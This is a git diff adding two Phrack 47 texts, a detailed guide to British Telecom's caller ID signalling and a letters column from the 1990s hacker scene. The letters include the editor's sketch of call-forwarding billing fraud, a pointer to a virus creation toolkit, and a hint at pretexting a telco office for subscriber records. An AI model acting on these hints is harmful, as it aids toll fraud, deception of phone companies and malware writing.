+MC_ZZK_.M)_PV2OC1V+?ZB/\`WW_FE.7_`)#4O_75OY"N)['0MS#TG_7R?[R__
+MRJSJ7_(&_P"WX?\`H)JG\0/8R?#_`/QZ'Z/_`.A5U<'^L;_<G_E53^(2^%&#\
+MX?\`^/.[_P"OD?\`LU+J/_']9_\`763^9H?Q_P!=AK8U;G_C]/T/\J?#_P`A$
+M)?\`?/\`.LP*=K_R$=3_`.O=OYM69KO_`"&+#_=2M8_$*1'HOW1]6_\`0FK5V
+MN?\`D,R_]=%_D:4_C!;(UHNL?^[_`$JQ9]?SK)[@]A\?WI/J*NQ?Z^/\/Y4TQ
+M)CY^@^E-/W&JEN+H0V__`!\CZ'^E<CJ'_(3UOZP?^C!6U,.I7UG_`(^+K_KKA
+M#_Z.>GR_\M/^NA_E4O;^NR&MRWXD_P"0AIO^Y_[-7(S_`/(/A_Z[/_[+5PZ?3
+MUW(74BU+_D88_P#KM5R[_P"0[??[K?R-5T7H+K\RNO\`QX3_`/78_P`EKI/^1
+M6]S_`,"_]!%9U#2(Z'_5Q_\`7,_SJ[8_Q_Y]*R9H:*=&^G]:HVW_`!^R?]=OE
+M\:A=1&;%_P`>5K](?YBN*LO^0S_VT:NRC]HRJ[HR)OOCZ_UH7[XKN.$LVO\`I
+MJYO]RK6@_P#(4M?^NJUG+9FL/B1TGCW_`)"`_P!T_P!:XE>U31^!!4W$[&G];
+MQ]*V,QR]'_W?ZT^3_5GZ+4E%R#[Z_0?RJ]9?ZMO]ZL9;&\337[T7T_I277^J2
+JA_W?ZUS]4:O8P)?];)]!_*H)_NI^-=B.610%+6ID.B_I2G[Z_44#`/_9J
+``
+end
diff --git a/phrack47/19.txt b/phrack47/19.txt
new file mode 100644
index 0000000..460ce23
--- /dev/null
+++ b/phrack47/19.txt
@@ -0,0 +1,639 @@
+                              ==Phrack Magazine==
+
+                 Volume Six, Issue Forty-Seven, File 19 of 22
+
+               A Guide To British Telecom's Caller ID Service
+
+                                   By DrB0B
+                         (DrB0b@grex.cyberspace.org)
+
+
+
+Introduction:
+
+Whilst caller ID services are old news to American readers, to UK phone-
+phreaks they are a new and potentially exciting addition to British-
+Telecom's network services. Many people will have already read articles
+describing CNID, almost invariably these articles have been based on systems
+utilizing Bellcore's CLASS signalling requirements, it should be
+noted that while BT's Caller Display System is also based on CLASS there
+are some significant technical differences. I have tried to make the
+information in this article as comprehensible as possible, unfortunately the
+telecommunications industry is one of the most jargon-infested industries in
+the world so if you have any questions about anything in this article don't
+hesitate to contact me at the above address, I'll do my best to help.
+BT hope to have their Caller Display Service available by November 1994.
+
+LATE NEWS: Today, Nov 1st 1994, BT announce that caller ID services would
+be withheld for a while longer as the public are too stupid to understand
+what it means, I swear I'm not making this up. According to BT newsline
+(0800 500005) "The public failed to comprehend that caller display services
+meant that caller number would be transmitted with every call, nor did they
+understand that CDS could be blocked on a per call basis by using the 141
+prefix, or on a per line basis by arrangement with BT. Go figure !
+New date for service launch is towards the end of November.
+
+
+(1) What is Calling Line Identification Presentation.
+
+When BT introduce their Caller Display Service over the analogue local
+access network the first service available will be Calling Line Identification
+Presentation (CLIP), this provides for the delivery of the callers
+number when a telephone call arrives, in the near future it will also
+provide the callers name. When the callers name or number cannot be delivered
+then one of two reasons for the failure will be displayed, (1) name or number
+not available (the caller has an unlisted number), or, (2) name and number
+withheld by customer (this is done by the caller dialling 141 before dialling
+the called number, this results in the message "CLI Withheld" being displayed
+on the recipients equipment). In addition to caller identification the CLIP
+service can also deliver network messages, the time, date, and, (optionally),
+some indication of call type.
+As noted above callers can choose to withhold CLI information by using the
+prefix 141, users should be aware that this has no effect on BT's ability
+to trace a call, the 141 prefix is a service activation code whilst call
+tracing is an operator function.
+
+
+(2) Some Necessary Definitions
+
+From here it gets a bit more complex, your mileage may vary. It's probably
+best if I define some of the terms to be used before going any further.
+
+Line Reversal
+The potential difference between the two wires of the exchange line (A+B)
+will always be equal to or greater than 15 volts. An incoming Caller
+Display message will be preceded by a polarity reversal between the two wires.
+
+Idle State Tone Alert Signal
+Signals sent in the idle state will be preceded by a Tone Alert signal and
+a Channel Seizure signal. Terminal equipment may recognize the Idle State
+Tone Alert Signal by the detection of both frequencies together, or by
+detection of a single (the lower) frequency. In the case of single
+frequency detection the recognition time should be not less than 30ms,
+if both frequencies are detected the recognition time can be reduced to not
+less than 20ms.
+
+Fig 1. The Idle State Tone Alert Signal
+      --------------------------------------------------------------
+      |Frequencies              | 2130 hz and 2750 hz +/- 1%       |
+      --------------------------------------------------------------
+      |Received Signal Level    | -2dBV to -40 dBV                 |
+      --------------------------------------------------------------
+      |AC and DC load impedance | AC load is high impedance as     |
+      |                         | required by NET4                 |
+      --------------------------------------------------------------
+      |Unwanted Signals         | Total power of extraneous signals|
+      |                         | in the voice band (300-3400hz) is|
+      |                         | at least 20dB below the signal   |
+      |                         | levels                           |
+      --------------------------------------------------------------
+      |Duration                 | 88 to 110 msec                   |
+      --------------------------------------------------------------
+Note: NET4 is European Telecommunications Standard ETS 300 001;
+Attachments to PSTN; general technical requirements for equipment
+connected to an analogue subscriber interface in the PSTN).
+
+DC Load
+NET4 requires that the total of terminal equipment on a line shall not
+draw in excess of 120 microA in the idle state. The Caller Data Service
+terminal equipment may, as an option, draw DC of up to 0.5 mA par device
+at 50 V line voltage, but only during CDS idle state, otherwise the
+conditions of NET4 apply.
+
+DC Wetting Pulse
+In order to improve reliability of idle state data reception (by reducing
+noise), it is mandatory that the terminal equipment shall draw a short
+pulse of current from the line by applying a resistive load for a
+specified time.
+
+
+(3) Signalling
+
+For an understanding of the processes involve we need to have some under-
+standing of the four layers used in Basic Mode communication. Basic Mode
+communication covers transmission of data between network and terminal
+equipment, either before ringing is applied or without any ringing,
+transmission is either down-stream (network to terminal equipment), or
+up-stream (terminal equipment to network).
+
+Physical Layer: This defines data symbol encoding and modulation, and
+                analogue line conditions.
+Datalink Layer: This defines framing of messages for transmission and a
+                simple error checking procedure.
+Presentation Layer: This defines how application-related information is
+                    assembled into a message.
+Application Layer: This defines the application that uses the signalling.
+                   In this case Calling Line Identity Presentation.
+
+Now we'll go into a little more detail about each of these layers.
+
+
+Physical Layer:
+
+Signalling may occur in either the idle state or loop state. We won't
+discuss loop state signalling here, as it's not pertinent at this stage.
+An incoming CDS call is indicated by a polarity reversal on the A and B
+wires, usually followed by ringing current applied to the B wire. The
+Terminal Equipment responds to the Idle State Tone Alert by drawing a DC
+wetting pulse and applying a DC load and an AC load. The DC wetting pulse
+is applied during the idle period following the end of the Idle State
+Tone Alert signal. The AC load is applied at the same time as the DC
+wetting pulse. It is removed after the end of the V.23 signals. The DC load
+is applied and removed at the same time as the AC load impedance. On removal
+of the DC and AC loads the CPE reverts to the idle state. For some
+applications the Channel Seizure may be delayed by up to 5 seconds,
+either or both silent periods may be extended in this case.
+If a terminal equipment loop state condition is detected the CDS message
+is aborted and the call presented as a non-CDS call.  All data transmitted
+by the physical layer consists of 8-bit characters transmitted asynchronously
+preceded by one start-bit and followed by one stop bit. With the exception
+of the mark signal immediately following channel seizure there should be
+no more than 10 stop bits between characters.
+
+Values for octets are given in the following format:
+
+   S2 M B7 B6 B5 B4 B3 B2 L S1
+(Order of bits S1 first S2 last)
+
+where S1 = start bit
+ S2 = stop bit
+ M  = most significant bit
+ L  = least significant bit
+ B* = bit numbers 2 to 7
+
+Octets are transmitted with most significant octet first.
+
+
+
+Datalink Layer:
+
+The datalink layer provides framing of data into packets that can be
+distinguished from noise, and has error detection in the form of a check-
+sum.
+
+Fig 2. Datalink Packet Format
+
+     -------------------------------------------------------------
+     |Channel  |Mark    |Message   |Message   |Message   |Check- |
+     |Seizure  |Signal  |Type      |Length    |          |sum    |                    |         |        |          |          |          |       |
+     -------------------------------------------------------------
+            ^^^^^^^^^^
+           Presentation
+        Layer
+
+
+Analysis of the fields in a Datalink Packet:
+
+Channel Seizure
+The channel seizure consists of a continuous sequence of alternate 0 and 1
+bits at 1200 bits/s. The purpose of channel seizure is to minimize the possibility of noise mimicking a genuine carrier. The length of channel
+seizure as seen by terminal equipment is at least 96 bits (80 msec). It
+may be longer, up to 315 bits (262 msec)
+
+Mark Signal
+The mark signal seen by terminal equipment is at least 55 bits (45 msec)
+of continuous mark condition (equivalent to a series of stop bits, or no
+data being transmitted).
+
+Message Type
+The message type is a single binary byte. The value depends on the
+application.
+
+Message Length
+The message length is a single binary byte indicating the number of bytes in
+the message, excluding the message type, message length, and checksum bytes.
+This allows a message of between 0 and 255 bytes.
+
+Message
+The message consists of between 0 and 255 bytes, according to the message
+length field. This is the presentation layer message (explained later).
+Any 8-bit value may be sent, depending on the requirements of the
+presentation layer and the application.
+
+Checksum
+The checksum consists of a single byte equal to the two's complement sum
+of all bytes starting from the "message type" word up to the end of the
+message block. Carry from the most significant bit is ignored. The
+receiver must compute the 8-bit sum of all bytes starting from "message
+type" and including the checksum. The result must be zero or the message
+must be assumed to be corrupt.
+
+
+
+Presentation Layer:
+
+
+Fig 3. Presentation Layer Message format
+     -------------------------------------------------------------------
+     |Parameter|Parameter|Parameter| ... |Parameter|Parameter|Parameter|
+     |Type     |Length   |Byte(s)  |     |Type     |Length   |Byte(s)  |
+     -------------------------------------------------------------------
+
+The fields Parameter Type, Length, and Byte, together describe one
+presentation layer parameter, and may be repeated.
+Parameter Type will be discussed more fully in the next section.
+Parameter Length is a single binary byte of a value between 0 and 255. In
+Basic Mode a complete message must be contained within a single datalink
+packet, this means that the total length of presentation layer parameters
+must not exceed 255 bytes.
+Parameter Byte(s) contains zero or more bytes of application related
+information. The information contained in this parameter should be en-
+coded in BT ISDN Character Set IA5 format.
+
+
+Parameter Type:
+
+There are eight parameter types associated with CLIP
+
+
+
+
+Fig 4. Parameter Type values
+       -------------------------------------------------------------
+       | Parameter Type Value  | Parameter Name                    |
+       -------------------------------------------------------------
+       | 00010001              | Call Type                         |
+       -------------------------------------------------------------
+       | 00000001              | Time & Date                       |
+       -------------------------------------------------------------
+       | 00000010              | Calling line directory number (DN)|
+       -------------------------------------------------------------
+       | 00000011              | Called directory number           |
+       -------------------------------------------------------------
+       | 00000100              | Reason for absence of DN          |
+       -------------------------------------------------------------
+       | 00000111              | Caller name/text                  |
+       -------------------------------------------------------------
+       | 00001000              | Reason for absence of name        |
+       -------------------------------------------------------------
+       | 00010011              | Network message system status     |
+       -------------------------------------------------------------
+
+
+The calling line directory number is the number of the line from which the
+call was made, or a substitute presentation number. The called directory
+number is the number that was called. This is of significance when the call
+has been diverted.
+There may be parameters of other types present. the call type parameter, if
+present will always be sent first, other parameters may be sent in any
+order. at least seven of these eight parameters must be recognized for the
+CLIP service (Called directory number is not necessary). Parameters may be
+sent with zero length. In such cases parameter length will be zero and the
+checksum will be correct. Parameters are usually encoded in IA5. The
+version used is a 7-bit code and is sent in 8-bit bytes with the most
+significant bit set to zero. Non-displayable characters (codes 0-32
+decimal) are not used. In the tables following byte number 1 is sent first
+followed by byte number 2 and so on.
+
+
+Call Type Parameter
+
+ ------------------------------------------------------
+ | Byte Number| Contents                              |
+ ------------------------------------------------------
+ | 1          | Call Type Parameter Type Code         |
+ |            | (00010001)                            |
+ | 2          | Parameter Length                      |
+ | 3          | Call Type                             |
+ ------------------------------------------------------
+
+
+
+ ------------------------------------------------------
+ | Call Type Encoding | Call Type                     |
+ ------------------------------------------------------
+ | 00000001           | Voice Call                    |
+ | 00000010           | ring-back-when-free-call      |
+ | 10000001           | message waiting call          |
+ ------------------------------------------------------
+
+If the call type parameter is omitted then the call type is "voice call".
+Additional Call Types may be defined later. Other call types, ie FAX, will
+be used when they are available. The "message waiting" call type is used
+to give an indication of a new message from a specific caller.
+
+
+Time and Date Parameter
+
+The Time parameter indicates the date and time (+/- 1 minute) of the event
+associated with the supplementary information message. Where the call type
+has a value 127 (01111111) or less, then the time is the current time and
+can be used to set internal terminal equipment clocks and calendars. For
+a call of type "message waiting" the time and date refer to the time
+message was left or recovered. For other call types with value 128
+(10000000) or greater, the time and date may refer to some unspecified event
+and not necessarily current time.
+
+
+
+ --------------------------------------------------------
+ | Byte Number | Contents                               |
+ --------------------------------------------------------
+ | 1           | Time & Date parameter type code        |
+ |             | (00000001)                             |
+ | 2           | Parameter length (8)                   |
+ | 3           | Month                                  |
+ | 4           | Month                                  |
+ | 5           | Day                                    |
+ | 6           | Day                                    |
+ | 7           | Hours                                  |
+ | 8           | Hours                                  |
+ | 9           | Minutes                                |
+ | 10          | Minutes                                |
+ --------------------------------------------------------
+
+Calling Line Directory Number Parameter
+
+The maximum length of number sent is 18 characters. The first digit sent is
+in byte 3. The Calling Line Directory Number is a number that may be used
+to call back the caller, or the same service. It may not be the directory
+number of the originating call, for example, an 0800 may be associated
+with the caller. Where an alternative to the directory number of the caller
+is sent this is known as a Presentation Number. There is no indication of
+which type of number is sent, this may change.
+If only a partial number is known then that partial number may be sent. This
+will be followed by a "-". For instance, where a call comes from outside the
+digital network the area code may still be sent and shown as:
+
+     0171-250-
+
+or, (under the new national code) for an international call from France;
+
+     00 33-
+
+assuming the new international access code of 00.
+
+
+       ---------------------------------------------------------
+       | Byte Number | Contents                                |
+       ---------------------------------------------------------
+       | 1           | Calling Line Directory Number           |
+       |             | Parameter type code (00000010)          |
+       | 2           | Parameter length (n)                    |
+       | 3           | First digit                             |
+       | 4           | Second digit                            |
+       | .           | .                                       |
+       | .           | .                                       |
+       |n+2          | nth digit                               |
+       ---------------------------------------------------------
+
+
+
+
+Reason for Absence of Directory Number Parameter
+
+      ------------------------------------------------------------
+      | Byte Number | Contents                                   |
+      ------------------------------------------------------------
+      | 1           | Reason for Absence of DN parameter type    |
+      |             | code (00000100)                            |
+      | 2           | Parameter length (1)                       |
+      | 3           | Reason                                     |
+      ------------------------------------------------------------
+The reason will be one of the following BT IA5-encoded values
+    "P" = "Number Withheld"
+    "O" = "Number Unavailable"
+
+
+Called Directory Number Parameter
+
+The Called Directory Number is the telephone number used by the caller when
+making the call. The maximum length of characters sent is 18, the first digit
+of the number is sent in byte 3, the second in byte 4 and so on.
+
+
+       ---------------------------------------------------------
+       | Byte Number | Contents                                |
+       ---------------------------------------------------------
+       | 1           | Called Directory Number Parameter       |
+       |             | type code (00000011)                    |
+       | 2           | Parameter length (n)                    |
+       | 3           | First digit                             |
+       | 4           | Second digit                            |
+       | .           | .                                       |
+       | .           | .                                       |
+       | n+2         | nth digit                               |
+       ---------------------------------------------------------
+
+
+
+Caller Name/Text parameter
+
+At the launch of the service the Caller Name will not be available, the
+parameter will contain text only.
+The Name/Text consists of between 1 and 20 BT-IA5 characters. The parameter
+may be used for other information when no name is available.
+
+
+       ---------------------------------------------------------
+       | Byte Number | Contents                                |
+       ---------------------------------------------------------
+       | 1           | Caller Name/Text Parameter type code    |
+       |             | (00000111)                              |
+       | 2           | Parameter length (n)                    |
+       | 3           | First digit                             |
+       | 4           | Second digit                            |
+       | .           | .                                       |
+       | .           | .                                       |
+       | n+2         | nth digit                               |
+       ---------------------------------------------------------
+
+
+
+Reason for Absence of Name Parameter
+
+The reason will be one of the following;
+
+   P "Name Withheld"; Caller has withheld delivery of name
+   O "Name Unavailable"; The name is not available
+
+
+
+       ---------------------------------------------------------
+       | Byte Number | Contents                                |
+       ---------------------------------------------------------
+       | 1           | Reason for Absence of Name type         |
+       |             | parameter (00001000)                    |
+       | 2           | Parameter length (1)                    |
+       | 3           | Reason                                  |
+       ---------------------------------------------------------
+
+
+Network Message System Status Parameter
+
+The value of the Network Message System Status parameter is a binary
+encoded value indicating the number of messages waiting in the message
+system. 0 means no messages, 1 means one or an unspecified number, other
+values, up to 255, indicate that number of messages waiting.
+This parameter is not necessarily associated with a normal phone call, and
+will probably be sent as a no ring call.
+
+
+       ---------------------------------------------------------
+       | Byte Number | Contents                                |
+       ---------------------------------------------------------
+       | 1           | Network System Message Status           |
+       |             | Parameter (00010011)                    |
+       | 2           | Parameter length (1)                    |
+       | 3           | Network System Message Status           |
+       ---------------------------------------------------------
+
+
+Unless a Call Type parameter is also set, then any time parameter sent with
+the Network System Status parameter will indicate current clock time. This
+is to enable the terminal equipment to assume the time is current time and
+to set it's internal clock where no Call Type parameter is sent.
+
+
+(4) Message Length
+
+
+The longest CLIP message, excluding datalink layer information is currently
+64 bytes. This length is expected for call types "Voice", "Ring-back-when-
+free", "Message Waiting". In future there may be additional parameters that
+could extend message length, these will be sent after the parameters Call
+Type, caller number, name/text, reason for absence of name or number, and
+Network Message System Status.
+
+
+(5)Fig 5. Received Characteristics of V.23 Signals
+ ------------------------------------------------------------
+ | Modulation              | FSK                            |
+ ------------------------------------------------------------
+ | Mark (Logic 1)          | 1300 Hz +/- 1.5%               |
+ ------------------------------------------------------------
+ | Space (Logic 0)         | 2100 Hz +/- 1.5%               |
+ ------------------------------------------------------------
+ | Received signal level   | -8dBV to -40dBV                |
+ | for mark                |                                |
+ ------------------------------------------------------------
+ | Received signal level   | -8dBV to -40dBV                |
+ | for space               |                                |
+ ------------------------------------------------------------
+ | Signal level            | The received signal levels may |
+ | differential            | differ by up to 6 dB           |
+ ------------------------------------------------------------
+ | Unwanted signals        | Total power of extraneous      |
+ |                         | signals in the voice band is at|
+ |                         | least 20dB below the signal    |
+ |                         | levels                         |
+ ------------------------------------------------------------
+ | AC & DC load impedance  | AC load impedance is Zss (see  |
+ |                         | below)                         |
+ |                         | DC load impedance has been de- |
+ |                         | scribed above.                 |
+ ------------------------------------------------------------
+ | Transmission rate       | 1200 baud +/- 1%               |
+ ------------------------------------------------------------
+ | Data format             | Serial binary asynchronous (1  |
+ |                         | start bit first, then 8 data   |
+ |                         | bits with least significant    |
+ |                         | bit first, followed by 1 stop  |
+ |                         | bit minimum, up to 10 stop bits|
+ |                         | maximum. Star bit 0, stop bit 0|
+ ------------------------------------------------------------
+
+
+(6)Fig 6. Zss
+Zss: a complex impedance nominally represented by the following network;
+
+       139 nF
+    ----------------
+    |              |
+     ------               -------
+     |     |              |     |      ------------
+     |     ----------------     |      |          |
+O-----                          --------          ----------O
+     |                          |      |          |
+     |     ---------------      |      ------------
+     |     |              |     |         827 Ohms
+     ------               -------
+    |              |
+    ----------------
+       1386 Ohms
+
+
+(7)Fig 7. BT IA5 alpha-numeric character set
+
+   -----------------------------------------------------
+   | B   | b7  | 0  | 0  | 0  | 1  | 1  | 1  | 1  | 1  |
+   -----------------------------------------------------
+   | I   |     |    |    |    |    |    |    |    |    |
+   -----------------------------------------------------
+   | T   | b6  | 0  | 0  | 1  | 1  | 0  | 0  | 1  | 1  |
+   -----------------------------------------------------
+   | S   |     |    |    |    |    |    |    |    |    |
+   -----------------------------------------------------
+   |     | b5  | 0  | 1  | 0  | 1  | 0  | 1  | 0  | 1  |
+      ---------------------------------------------------------
+      |  BITS  |     | 0   | 1  | 2  | 3  | 4  | 5  | 6  | 7  |
+      |b b b b |     |     |    |    |    |    |    |    |    |
+      |4 3 2 1 |     |     |    |    |    |    |    |    |    |
+      ---------------------------------------------------------
+      |0 0 0 0 | 0   |NUL  |TC7 |SP  | 0  | @  | P  | `  | p  |
+      ---------------------------------------------------------
+      |0 0 0 1 | 1   |TC1  |DC1 | !  | 1  | A  | Q  | a  | q  |
+      ---------------------------------------------------------
+      |0 0 1 0 | 2   |TC2  |DC2 | "  | 2  | B  | R  | b  | r  |
+      ---------------------------------------------------------
+      |0 0 1 1 | 3   |TC3  |DC3 | #  | 3  | C  | S  | c  | s  |
+      ---------------------------------------------------------
+      |0 1 0 0 | 4   |TC4  |DC4 |   | 4  | D  | T  | d  | t  |
+      ---------------------------------------------------------
+      |0 1 0 1 | 5   |TC5  |TC8 | %  | 5  | E  | U  | e  | u  |
+      ---------------------------------------------------------
+      |0 1 1 0 | 6   |TC6  |TC9 | &  | 6  | F  | V  | f  | v  |
+      ---------------------------------------------------------
+      |0 1 1 1 | 7   |BEL  |TC10| '  | 7  | G  | W  | g  | w  |
+      ---------------------------------------------------------
+      |1 0 0 0 | 8   |FE0  |CAN | (  | 8  | H  | X  | h  | x  |
+      ---------------------------------------------------------
+      |1 0 0 1 | 9   |FE1  |EM  | )  | 9  | I  | Y  | i  | y  |
+      ---------------------------------------------------------
+      |1 0 1 0 | 10  |FE2  |SUB | *  | :  | J  | Z  | j  | z  |
+      ---------------------------------------------------------
+      |1 0 1 1 | 11  |FE3  |ESC | +  | ;  | K  | [  | k  | {  |
+      ---------------------------------------------------------
+      |1 1 0 0 | 12  |FE4  |IS4 | ,  | <  | L  | \  | l  | |  |
+      ---------------------------------------------------------
+      |1 1 0 1 | 13  |FE5  |IS3 | -  | =  | M  | ]  | m  | }  |
+      ---------------------------------------------------------
+      |1 1 1 0 | 14  |SO   |IS2 | .  | >  | N  | ^  | n  | ~  |
+      ---------------------------------------------------------
+      |1 1 1 1 | 15  |SI   |IS1 | /  | ?  | O  | _  | o  |DEL |
+      ---------------------------------------------------------
+
+Where;
+
+     BEL = Bell
+     CAN = Cancel
+     DC  = Device Control
+     EM  = End of Medium
+     ESC = Escape
+     FE  = Format Effectors
+     IS  = Information Separator
+     NUL = Null
+     SI  = Shift In
+     SO  = Shift Out
+     SP  = Space
+     SUB = Substitute Character
+     TC  = Transmission Control
+
+
+
+
+
+
+Conclusion:
+
+My head hurts, I've been in front of this screen for eight hours, I started
+this because I was chucked out of the cinema for being drunk and disorderly
+and I'd nothing else to do, I've got through 2 packs of Marlboros, 1 bottle
+mad dog and a stack of telco manuals. Most of this has been lifted whole-
+sale from those manuals (in the great tradition of all p/h g-philes). I'm
+currently working on a round up of ISDN2 and ISDN30, a glossary for European
+phone phreaks (almost ready), and a technical description of British and
+Irish cellular communication systems. If anybody has any info to share on any
+of these things, or any questions they'd like answered (stick to the subject
+though, I don't know who killed Kennedy, #8^)), then get in touch with me at
+the above address or at any of a variety of boards.
diff --git a/phrack47/2.txt b/phrack47/2.txt
new file mode 100644
index 0000000..e810ca7
--- /dev/null
+++ b/phrack47/2.txt
@@ -0,0 +1,1280 @@
+                              ==Phrack Magazine==
+
+                 Volume Six, Issue Forty-Seven, File 2 of 22
+
+*****************************************************************************
+
+                                Phrack Loopback
+
+-----------------------------------------------------------------------------
+
+G'Day,
+
+You dont know who i am, and i appreciated that but i hope your read my little
+note here and take it into consideration.
+
+Ive been into the Australian Hacking Scene (if there is such a thing :-)
+for only about 2years, but recenlty opened a h/p bbs here in Australia.
+What i am writing and asking is if it is possilbe to place kinda an add of
+some description in the next issue of phrack, something to the lines of:-
+
+   H/P bbs recently opened in Australia - JeSteRs BBS +61-7-ASK-AROUND
+
+If your looking for some form of donation $$ just let me know, if your
+wondering is his guy a fed or something, mail DATA KING and speak to him, he
+was one of the bbs first users and as you know he has written in the Int
+Scene for the last too issues, but wont be in Issue #47 or i would have asked
+him to place the advertisment in this report.
+
+Regards, Jesta
+
+[Cool!  Nice to see there's BBSs still popping up overseas.  It would be
+ nice if I had the number...hell, I'd even call... but oh well,
+ I suppose I (and all the Phrack readers) will just have to "ASK-AROUND"]
+
+-----------------------------------------------------------------------------
+
+   Hi Erikb,
+
+    Last week you said you'd accept a bbs ad .. well here it is.
+   If you'd publish it in phrack i'd be most grateful!
+
+                                A Gnu BBS!
+                           1000's h/p Related texts
+     Phrack, CoTNo, B0W, cDc, NiA, CuD, Risks,Sphear,SCAM!,NeuroCactus
+          Conferences covering Unix/VMS/System Security/Phreaking
+   And absolutely no mention of "The Information Super Highway" anywhere!
+                               +617-855-2923
+
+      tnx,
+       badbird
+
+[I said I'd print the ad...and now I have.]
+
+-----------------------------------------------------------------------------
+
+ATTN: ALL COMPUTER WHIZ KIDZ..... I DESPARATELY NEED YOUR HELP!!!
+
+
+Retired R.C.M.P officer formerly involved with priority levels of 
+electronic surveillance has informed me that my residential telephone 
+appears to have been compromised at a point other than inside or 
+immediately outside my residence.
+
+After an intensive evaluation of the premises his conclusion was that 
+remote manipulation of the telephone company switch where my circuit 
+could be victim was the problem.
+
+The main focus of this exercise is to show how one can infiltrate a 
+telephone company's network; remotely manipulate the company's switch; 
+process long distance calling;make it appear that the calls originated 
+from a particular site and then "fooling" the company's billing 
+mechanisms to invoice that particular location.
+
+Is this physically possible? Bell Canada categorically denies this 
+possibility. I need proof! How is it done?
+Please advise as soon as possible.
+
+I'd sincerely appreciate any help, advise and/or information anyone out 
+there can offer in this particular situation.
+
+Please leave a way to get in touch! If you prefer to remain unknown, 
+thanks a million, and rest assured that I WILL RESPECT and PROTECT you 
+anonimity.
+
+Regards,
+
+John P. Marinelli    jmarinel@freenet.niagara.com
+
+[My take on this is that with relative ease, someone could establish
+ call forwarding on a line, make it active to some remote location, and
+ call the original number numerous times, causing the owner of the
+ hacked line to be billed for all the calls to the forwarded location.
+
+ If anyone knows how to do this, STEP BY STEP on a DMS-100, please,
+ contact Mr. Marinelli to help him out with his court case.  I don't
+ know a whole lot about NT equipment, so I don't know the
+ specifics of how this may have happened, only the generalities.
+
+ Wouldn't it be nice to have the Underground "HELP" someone out
+ for a change?]
+
+-----------------------------------------------------------------------------
+
+y0, Black Flag here... heres the info you told me to mail you about the 
+GRaP/H (Gainesville Regional Association of Phreakers and Hackers) meetingz
+
+Gainesville, FL
+1st + 3rd Saturday of the month, 4pm - ???
+meet in The Loop on 13th Street
+Black Flag will be casually carrying a 2600
+look around, you'll see him.
+
+[Well, looks like the Florida Hackers have a new place to congregate.
+ And so do the Florida FBI Field Offices.  :) ]
+
+-----------------------------------------------------------------------------
+
+I was wondering where I could find any virus authoring tools for the PC,
+Unix, or VMS.
+
+
+[You can find Nowhere Man's Virus Creation ToolKit on BBSs around the
+ globe.  Have you looked???  I've never heard of UNIX or VMS virus tools.
+ Do you know something I don't?  Do you know how a virus works? ]
+
+
+-----------------------------------------------------------------------------
+
+Chris, found something you might like.  Here's an ad from the latest
+PHOENIX SYSTEMS catalog:
+
+THE CALLER ID BLOCKER FIRST TIME AVAILABLE IN THE U.S.
+
+By April, 1995 all telephone companies must deliver callers name and
+telephone number to the caller ID system.  The law prohibits any telephone
+company from offering customers an option to permanently disable their line
+from the ID system.
+
+This means that even if you have an unlisted number, everyone you call will
+now have your telephone number and name.  Big brother is now one watching,
+now he has your name and number.  No more anonymous calls to the IRS, city
+hall, real estate agents, car dealers, health department or anyone.  Many
+business professionals use their home telephone to return calls.  Do you
+want your patients and clients to have access to your home telephone number?
+
+We are proud to bring you the unique ANONYMOUS 100.  It installs on any
+telephone in seconds and completely KILLS THE EFFECTS OF "CALLER ID"!  Yes,
+you can have your privacy back.  The ANONYMOUS 100 is FCC approved and
+carries a one year guarantee.
+
+#1276...............................................................$69.95
+
+Is it just me, or is this a load of bullshit?  Didn't CA and TX both pass
+laws to make CLID illegal in those states?  I know that before MA would
+allow it in the state, they told the telco that line blocking had to be
+offered free (and it is, on per/call and permanent basis).  Did the feds
+pass this new law while I was sleeping, or is this company just playing on
+paranoia (not the first time) and trying to make a buck?
+
+Eric
+
+[Well Eric, it looks to me that this is a nifty little box that waits for
+ voltage drop and immediately dials *67 before giving you a dialtone.
+ Woo Woo!  $69.95!  It certainly is worth that to me to not have to dial
+ 3 digits before I make a call.  All that wear and tear ruins the
+ fingers for typing.  PFFFT....
+
+ About Caller-ID, well, it's legal just about every place I know of.
+ I'm sure there are a feel hold-outs, but offering per-line blocking for
+ individuals worried about privacy satisfied most Public Utility
+ Commissions.  In fact, I think April 1 was the date that all Interconnects
+ were supposed to be  upgraded to support the transfer of CLID information
+ over long distance calls.  I don't think this has been turned on everywhere,
+ but the software is supposed to be in place.
+
+ *67.  Don't dial from home without it.]
+
+-----------------------------------------------------------------------------
+
+This message serves a multifold purpose:
+
+(these response/comments are in referance to Phrack Issue 46 - Sept 20 1994)
+
+A)
+
+A question was brought up concerning a Moterola Flip Phone and the user 
+inability to gain access to the programing documentation.  I happen to 
+own (legally) a Motorola Flip Phone that I will assume to be the same and 
+I was not given the documentation either, though I have not tried asking 
+for it.  I will call Motorola and ask for *my* rightful copy and foreward 
+my results (if I gain access) to phrack for proper distribution amoung 
+appropriate channels.  If I do not gain access, I would appriciate to 
+hear from anyone who has (this should not be limited to simply the M. 
+Flip Phone, I have interests in all areas).
+
+B)
+
+Later in that issue (Sept 20, 1994) a list of university and colege 
+dialups were provided... I live in the 218/701 (right on the border) and 
+have a collection of them for addition to the list if you (or anyone 
+else) should so desire.  I would post them now, but I have limited time 
+and have to dig to find them.  I also have some numbers that some readers 
+may find of interest.
+
+C)
+
+My living in the 218/701 is the main reason for my writting.  I used to 
+live 612 and knew a lot of people in the area, but now I am stuck here in 
+a little shit town (pop. 7000) where the cloest thing to a computer is 
+made by John Deere.  I need to find someone in the 218 or 701 to work 
+with or meet... if you know anyone...???  The closest BBS is long 
+distance and even then it's crap... I would like to start my own, but who 
+the fuck would call?  Who the fuck would I invite?  My old H/P friends in 
+612 would, but I don't need the heat as they would all go through 950's 
+or some other method... I think you understand.
+
+any help would be greatly appreciated  By the way I could also use some 
+218/701 ANAC or CN/A... any help here?
+
+Aesop
+
+[In order:
+
+ a) Good luck with Moto.  You'll need it.
+ b) Yes, I really still need your university dialups.  Issue 48 will
+    have a much more complete list (I hope!)
+ c) If anyone knows any bbs'es in those area codes, please send
+    them in so I can pass along the info.
+
+ Other) For CNA information, just call your business office.  They ALWAYS
+        help.  Especially if you mention that CNA didn't have a current
+        record. :) ]
+
+-----------------------------------------------------------------------------
+
+To whom it may concern at phrack, I would like to subscribe to Phrack. I
+didn't use PGP because :-
+
+i.     I never had any real need to
+ii.    I came across the document below while dinking around with gopher. I
+would pretty much guess phrack knows about it already. If you do know about
+it, could you tell me another way to ensure my mail privacy?
+
+Thank you.
+
+Xombi.
+
+---------------------BEGIN E-MAIL DOCUMENT---------------------
+
+This section is from the document '/email-lists/Funny'.
+
